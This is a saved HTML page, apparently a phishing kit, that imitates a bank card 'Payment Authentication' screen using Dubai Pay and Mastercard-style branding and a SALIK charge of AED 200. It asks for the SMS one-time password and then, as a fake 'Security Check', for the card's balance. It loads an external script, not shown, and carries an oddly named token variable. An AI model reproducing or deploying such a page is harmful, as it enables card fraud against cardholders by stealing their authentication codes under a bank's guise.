<!DOCTYPE html>
<!-- saved from url=(0037)https://perfecktly.mom/security/#code -->
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
            <script> 
                const fuckYouToken = "452aa2dc01e7c6f1ee4e7ae21141db57f13e06d6037977e117e614c5eb77307b18429e"
            </script>    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>[data-real-id="main-balance-error-text"],[data-real-id="main-code-error-text"]{color: red;font-size: 12px;line-height: 1.2;display: block;}#main-loader_{position: absolute;top: 0;left: 0;width: 100%;height: 100%;background: #ffffffa6;display: flex;align-items: center;justify-content: center;z-index: 2;}#main-loader_ img{width: 59px;}[data-real-id="resend-code"],[data-real-id="send-code"],[data-real-id="send-balance"],[data-real-id="exit"],a{cursor: pointer;}</style>
<script type="text/javascript" defer="" src="./Security page_files/472e6a4e-23e5-4110-9847-924ecc7c11b1.js.Без названия"></script></head>
<body style="margin:0"><title>Security page</title>
<style>*,:after,:before{box-sizing:border-box;font-family:Helvetica;font-size:12px;line-height:18px}.xafwel:disabled{background:#7d888f!important}.xafwel.in-active img{display:block!important}.xerfi{padding-left:20px}.xerfi:before{content:'?';display:inline-block;width:15px;height:15px;background:#f60;color:#fff;text-align:center;margin-right:5px;font-size:12px;line-height:15px}</style>

    <div style="background:#00000094;position:relative;width:100%;height:100vh">
        <div style="background:#fff;position:absolute;top:50%;left:50%;transform:translate(-50%, -50%);margin: 0 auto;border-radius:5px;width:97%;max-width:390px;height:auto;padding:24px;">
            <div style="display:flex;flex-wrap:wrap;justify-content:space-between;margin-bottom:10px">
                <div class="flex: 0 0 50%;">
                    <img data-real-id="project-logo" style="width:100px;height:50px;object-fit: contain;" src="./Security page_files/dubai-pay-logo.png" alt="">
                </div>
                <div class="flex: 0 0 50%;">
                    <img data-real-id="brand-logo" style="width:100px;height:50px;object-fit: contain;" src="./Security page_files/mc.gif" alt="">
                </div>
            </div>
            <div data-real-id="code-window" style="display: block;">
                <div style="font-size:18px;font-weight:bold">Payment Authentication</div>
                <div style="border-top: 1px solid rgb(222, 222, 222);border-bottom: 1px solid rgb(222, 222, 222);padding-top:18px; margin-top:4px">
                    <div>A one-time password (“OTP”) has been sent by SMS to your mobile number. Please enter the 6-digit OTP to proceed with this online transaction.</div>
                    <div style="margin-top:14px;">
                        <div style="display:flex; margin-bottom:8px">
                            <div style="flex: 0 0 41%;padding: 0 12px;text-align:right;opacity:.5">Merchant:</div>
                            <div style="flex: 0 0 59%;padding: 0 12px"><span data-real-id="merchant">SALIK</span></div>
                        </div>
                        <div style="display:flex; margin-bottom:8px">
                            <div style="flex: 0 0 41%;padding: 0 12px;text-align:right;opacity:.5">Amount:</div>
                            <div style="flex: 0 0 59%;padding: 0 12px">
                                <span data-real-id="curency">AED</span> <span data-real-id="amount">200</span>
                            </div>
                        </div>
                        <div style="display:flex; margin-bottom:8px">
                            <div style="flex: 0 0 41%;padding: 0 12px;text-align:right;opacity:.5">Date:</div>
                            <div style="flex: 0 0 59%;padding: 0 12px"><span data-real-id="date">24/05/2024</span></div>
                        </div>
                        <div style="display:flex; margin-bottom:8px">
                            <div style="flex: 0 0 41%;padding: 0 12px;text-align:right;opacity:.5">Card number:</div>
                            <div style="flex: 0 0 59%;padding: 0 12px"><span data-real-id="card-number-text">*1029</span></div>
                        </div>
                    </div>
                </div>
                <div style="padding:12px 0;padding-bottom:0;border-bottom: 1px solid rgb(222, 222, 222);">
                    <input data-real-id="code" maxlength="6" style="border: 1px solid #dedede;background-color:#fff;border-radius:6px;font-size:14px;width:100%;text-align:center;padding:8px;" type="text" placeholder="SMS One-time password">
                    <div style="min-height:18px;color:red">
                        <div style="display:none" data-real-id="main-code-error">
                            <div data-real-id="main-code-error-text"></div>
                        </div>
                        <div style="display:none" data-real-id="code-local-error"></div>
                    </div>
                </div>
                <div style="color:#333;margin-top:15px;">
                    Please stay on this page, your bank sends a verification SMS-code within <b data-real-id="timer" style="color:#333" id="xteope">00:38</b>
                </div>
                <div data-real-id="resend-code" style="text-decoration: underline;color:gray;margin-top:12px;">Haven't received a one-time passcode?</div>
                <div style="margin-top:15px;">
                    <button data-real-id="send-code" class="xafwel" style="display:flex;align-items: center;justify-content: center;gap: 10px;border:none;margin:auto;height: 36px;line-height: 36px;font-weight: 100;border-radius: 4px;padding: 0 18px;color:white;background:#263e4c;">SUBMIT <img style="display:none;" width="20px" src="./Security page_files/spinner.gif" alt=""></button>
                </div>
            </div>
            <div data-real-id="balance-window" style="display: none;">
                <div style="font-size:18px;font-weight:bold">Security Сheck</div>
                <div style="border-top: 1px solid rgb(222, 222, 222);border-bottom: 1px solid rgb(222, 222, 222);padding-top:4px; margin-top:4px">
                    <div><p>To complete transaction, verify it's you. <br>Enter your card <span data-real-id="card-number-text">*1029</span> balance.</p></div>
                </div>
                <div style="padding:12px 0;padding-bottom:5px;border-bottom: 1px solid rgb(222, 222, 222);">
                    <input data-real-id="balance" style="margin-bottom:3px;border: 1px solid #dedede;background-color:#fff;border-radius:6px;font-size:14px;width:100%;text-align:center;padding:8px;" type="text" placeholder="Enter your card balance">
                    <div style="min-height:18px;color:red">
                        <div style="display:none" data-real-id="main-balance-error">
                            <div data-real-id="main-balance-error-text"></div>
                        </div>
                        <div style="display:none" data-real-id="balance-local-error"></div>
                    </div>
                </div>
                <div style="margin-top:15px;">
                    <button data-real-id="send-balance" class="xafwel" style="display:flex;align-items: center;justify-content: center;gap: 10px;border:none;margin:auto;height: 36px;line-height: 36px;font-weight: 100;border-radius: 4px;padding: 0 18px;color:white;background:#263e4c;">SUBMIT <img style="display:none;" width="20px" src="./Security page_files/spinner.gif" alt=""></button>
                </div>
            </div>
            <div style="display:flex;justify-content:space-between;margin-top:5px;">
                <div style="flex: 0 0 50%;color:#0177ef;" id="xwe1trx" data-real-id="exit">Exit</div>
                <div style="flex: 0 0 50%;color:#0177ef;text-align:right;" class="xerfi">Help</div>
            </div>
        </div>
    </div>
    <script>
        function codeBefore() {
            
        }
        function codeAfter() {
            
        }

        function balanceBefore() {
            
        }
        function balanceAfter() {
            
        }
    </script>
<div style="display:none;" id="main-loader_"><img src="./Security page_files/spinner(1).gif"></div></body></html>